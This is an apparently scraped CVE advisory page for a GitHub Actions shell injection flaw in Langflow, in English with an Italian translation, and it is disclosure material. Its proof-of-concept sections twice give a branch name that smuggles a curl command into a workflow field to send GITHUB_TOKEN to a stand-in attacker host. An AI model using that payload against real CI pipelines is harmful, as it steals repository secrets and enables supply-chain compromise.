CVE-2026-33475

Published: Mar 24, 2026 Last Modified: Mar 24, 2026

ExploitDB:

Other exploit source:

Google Dorks:

CRITICAL 9,1

Source: [email protected]

Attack Vector: network

Attack Complexity: low

Privileges Required: none

User Interaction: none

Scope: unchanged

Confidentiality: high

Integrity: high

Availability: none

Description

AI Translation Available

Langflow is a tool for building and deploying AI-powered agents and workflows. An unauthenticated remote shell injection vulnerability exists in multiple GitHub Actions workflows in the Langflow repository prior to version 1.9.0. Unsanitized interpolation of GitHub context variables (e.g., `${{ github.head_ref }}`) in `run:` steps allows attackers to inject and execute arbitrary shell commands via a malicious branch name or pull request title. This can lead to secret exfiltration (e.g., `GITHUB_TOKEN`), infrastructure manipulation, or supply chain compromise during CI/CD execution. Version 1.9.0 patches the vulnerability.

---

### Details

Several workflows in `.github/workflows/` and `.github/actions/` reference GitHub context variables directly in `run:` shell commands, such as:

```yaml
run: |
validate_branch_name '${{ github.event.pull_request.head.ref }}'
```

Or:

```yaml
run: npx playwright install ${{ inputs.browsers }} --with-deps
```

Since `github.head_ref`, `github.event.pull_request.title`, and custom `inputs.*` may contain **user-controlled values**, they must be treated as **untrusted input**. Direct interpolation without proper quoting or sanitization leads to shell command injection.

---

### PoC

1. **Fork** the Langflow repository
2. **Create a new branch** with the name:
```bash
injection-test && curl https://attacker.site/exfil?token=$GITHUB_TOKEN
```
3. **Open a Pull Request** to the main branch from the new branch
4. GitHub Actions will run the affected workflow (e.g., `deploy-docs-draft.yml`)
5. The `run:` step containing:
```yaml
echo 'Branch: ${{ github.head_ref }}'
```
Will execute:
```bash
echo 'Branch: injection-test'
curl https://attacker.site/exfil?token=$GITHUB_TOKEN
```

6. The attacker receives the CI secret via the exfil URL.

---

### Impact

- **Type:** Shell Injection / Remote Code Execution in CI
- **Scope:** Any public Langflow fork with GitHub Actions enabled
- **Impact:** Full access to CI secrets (e.g., `GITHUB_TOKEN`), possibility to push malicious tags or images, tamper with releases, or leak sensitive infrastructure data

---

### Suggested Fix

Refactor affected workflows to **use environment variables** and wrap them in **double quotes**:

```yaml
env:
BRANCH_NAME: ${{ github.head_ref }}
run: |
echo 'Branch is: \'$BRANCH_NAME\''
```

Avoid direct `${{ ... }}` interpolation inside `run:` for any user-controlled value.

---

### Affected Files (Langflow `1.3.4`)

- `.github/actions/install-playwright/action.yml`
- `.github/workflows/deploy-docs-draft.yml`
- `.github/workflows/docker-build.yml`
- `.github/workflows/release_nightly.yml`
- `.github/workflows/python_test.yml`
- `.github/workflows/typescript_test.yml`

AI Generated Translation

Langflow è uno strumento per la creazione e distribuzione di agenti e workflow alimentati da AI. Esiste una vulnerabilità di remote shell injection non autenticata in più workflow di GitHub Actions nel repository Langflow antecedente alla versione 1.9.0. L'interpolazione non sanificata delle variabili di contesto di GitHub (ad esempio, `${{ github.head_ref }}`) nelle sezioni `run:` permette agli attaccanti di iniettare ed eseguire comandi shell arbitrari tramite un nome di branch o titolo di pull request malevoli. Ciò può portare all'esfiltrazione di segreti (ad esempio, `GITHUB_TOKEN`), manipolazione dell'infrastruttura o compromissione della supply chain durante l'esecuzione di CI/CD. La versione 1.9.0 corregge questa vulnerabilità.

---

### Dettagli

Diversi workflow in `.github/workflows/` e `.github/actions/` fanno riferimento direttamente alle variabili di contesto di GitHub all’interno di comandi shell `run:`, come ad esempio:

```yaml
run: |
validate_branch_name "${{ github.event.pull_request.head.ref }}"
```

Oppure:

```yaml
run: npx playwright install ${{ inputs.browsers }} --with-deps
```

Poiché `github.head_ref`, `github.event.pull_request.title` e gli `inputs.*` personalizzati possono contenere **valori controllati dall’utente**, devono essere trattati come **input non affidabile**. L’interpolazione diretta senza un’adeguata quotatura o sanificazione può portare a iniezioni di comandi shell.

---

### PoC (Proof of Concept)

1. **Fork** del repository Langflow
2. **Crea un nuovo branch** con il nome:
```bash
injection-test && curl https://attacker.site/exfil?token=$GITHUB_TOKEN
```
3. **Apri una Pull Request** nel branch principale da questo nuovo branch
4. GitHub Actions eseguirà il workflow interessato (ad esempio, `deploy-docs-draft.yml`)
5. La sezione `run:` contenente:
```yaml
echo "Branch: ${{ github.head_ref }}"
```
verrà eseguita come:
```bash
echo "Branch: injection-test"
curl https://attacker.site/exfil?token=$GITHUB_TOKEN
```

6. L’attaccante riceve il segreto CI tramite l’URL di exfiltrazione.

---

### Impatto

- **Tipo:** Shell Injection / Esecuzione di codice remoto in CI
- **Ambito:** Qualsiasi fork pubblico di Langflow con GitHub Actions attivo
- **Impatto:** Accesso completo ai segreti di CI (ad esempio, `GITHUB_TOKEN`), possibilità di pushare tag o immagini malevoli, manomettere le release o divulgare dati sensibili dell’infrastruttura

---

### Soluzione consigliata

Rifattorizzare i workflow interessati per **utilizzare variabili d’ambiente** e racchiuderle tra **doppi apici**:

```yaml
env:
BRANCH_NAME: ${{ github.head_ref }}
run: |
echo "Branch is: \"$BRANCH_NAME\""
```

Evitare l’interpolazione diretta `${{ ... }}` all’interno di `run:` per qualsiasi valore controllato dall’utente.

---

### File interessati (Langflow `1.3.4`)

Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')

Incomplete

Abstraction: Class Structure: Simple

Common Consequences

Security Scopes Affected:

Confidentiality Access Control Other Integrity Non-Repudiation

Potential Impacts:

Read Application Data Bypass Protection Mechanism Alter Execution Logic Other Hide Activities

Applicable Platforms

All platforms may be affected

Likelihood of Exploit: High

View CWE Details

Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')

Stable

Abstraction: Base Structure: Simple

Common Consequences

Security Scopes Affected:

Confidentiality Integrity Availability Non-Repudiation

Potential Impacts:

Execute Unauthorized Code Or Commands Dos: Crash, Exit, Or Restart Read Files Or Directories Modify Files Or Directories Read Application Data Modify Application Data Hide Activities

Applicable Platforms

Technologies: AI/ML, Not Technology-Specific, Web Server

Likelihood of Exploit: High

View CWE Details

https://github.com/langflow-ai/langflow/security/advisories…

https://github.com/langflow-ai/langflow/security/advisories/GHSA-87cc-65ph-2j4w

CVE-2026-33475

Description

Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')

Common Consequences

Applicable Platforms

Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')

Common Consequences

Applicable Platforms

Iscriviti alla newsletter